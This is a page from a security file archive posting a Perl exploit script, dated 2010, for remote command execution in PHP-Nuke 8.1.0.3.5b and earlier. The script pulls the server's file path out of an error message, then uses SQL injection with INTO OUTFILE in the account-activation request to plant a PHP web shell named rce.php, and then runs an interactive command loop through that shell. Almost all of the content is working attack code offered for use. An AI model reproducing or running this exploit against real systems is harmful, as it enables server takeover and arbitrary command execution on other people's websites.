what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

PHP-Nuke 8.1.0.3.5b Command Execution

PHP-Nuke 8.1.0.3.5b Command Execution
Posted Jul 13, 2010
Authored by Dante90, yawn

PHP-Nuke versions 8.1.0.3.5b and below remote command execution exploit.

tags | exploit, remote, php
SHA-256 | 64bb527d664f279468b14881835e40e57611ccfabd74907e6ac6bc808d040767

PHP-Nuke 8.1.0.3.5b Command Execution

Change Mirror Download
# PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit
# Author/s: Dante90 & yawn
# Contact Us: www.unitx.net
# Requirements: magic_quotes_gpc : off
# Greetings: #0day@irc.iside.us | #Unit-X@irc.unitx.net

# You will remember, Watson, how the dreadful business of the
# Abernetty family was first brought to my notice by the depth which the
# parsley had sunk into the butter upon a hot day.
# -- Sherlock Holmes

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Cookies;

sub Nuke::Usage {
print " \n [0-Day] PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit\n";
print " ------------------------------------------------------ \n";
print " * USAGE: *\n";
print " * cd [Local Disk]:\\ *\n";
print " * perl name_exploit.pl [host] [username] [password] *\n";
print " * -> REMEMBER TO ADD THE FINAL / TO THE HOSTNAME <- *\n";
print " ------------------------------------------------------ \n";
print " * Powered By Dante90 & yawn *\n";
print " * www.unitx.net *\n";
print " ------------------------------------------------------ \n";
}

#VARS
system $^O eq 'MSWin32' ? 'cls' : 'clear';
Nuke::Usage();
my $host = shift || die;
my $cmd;
my $shell = "<?php echo system(\$_GET[\"cmd\"]); ?>"; # Change Here to
Set your custom shell (for example use system() );
my $cookies = HTTP::Cookies->new;
my $request = LWP::UserAgent->new;
$request->agent("Mozilla 5/0");
$request->cookie_jar($cookies);
#END VARS
sub Full_Path_Disclosure() {
my $Get = $request->get($host.'themes/NukeNews/theme.php');
if ($Get->content =~ /No such file or directory in <b>(.+?)<\/b> on line/i) {
return $1;
} else {
return "failed";
}
}

print " * Getting Full Path\n";
my $path = Full_Path_Disclosure();
die " * Failed Path Extraction" if ($path eq "failed");
$path =~ s/themes(\/|\\)NukeNews(\/|\\)theme.php//g;
print " * Full Path Found: $path\n";
if ($path =~ m/\\/) {
$path =~ s/\\/\\\\\\\\/g;
}
print " * Injecting Shell To $host\n";
my $req2= $request->post($host."modules.php?name=Your_Account&op=activate&username=WTF",
{
check_num => "'UNION/**/SELECT 1,2,3,4,5,6,'".$shell."' FROM
`nuke_authors` INTO OUTFILE '$path"."rce.php",
},
Referer => $host."index.php");
print " * Injecting Successfully Completed\n";
print " * Shell now available on $host"."rce.php\n";
print " * Connecting to remote shell\n";
sleep(4);
print " * Connected.. Type \"quit\" to quit\n";
while() {
print "* root\@backdoor ~\$ ";
$cmd = <>;
chomp($cmd);
last if $cmd eq "quit";
$req2 = $request->get($host."/rce.php?cmd=".$cmd);
print $req2->content."\n";
}

Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    15 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    10 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    37 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close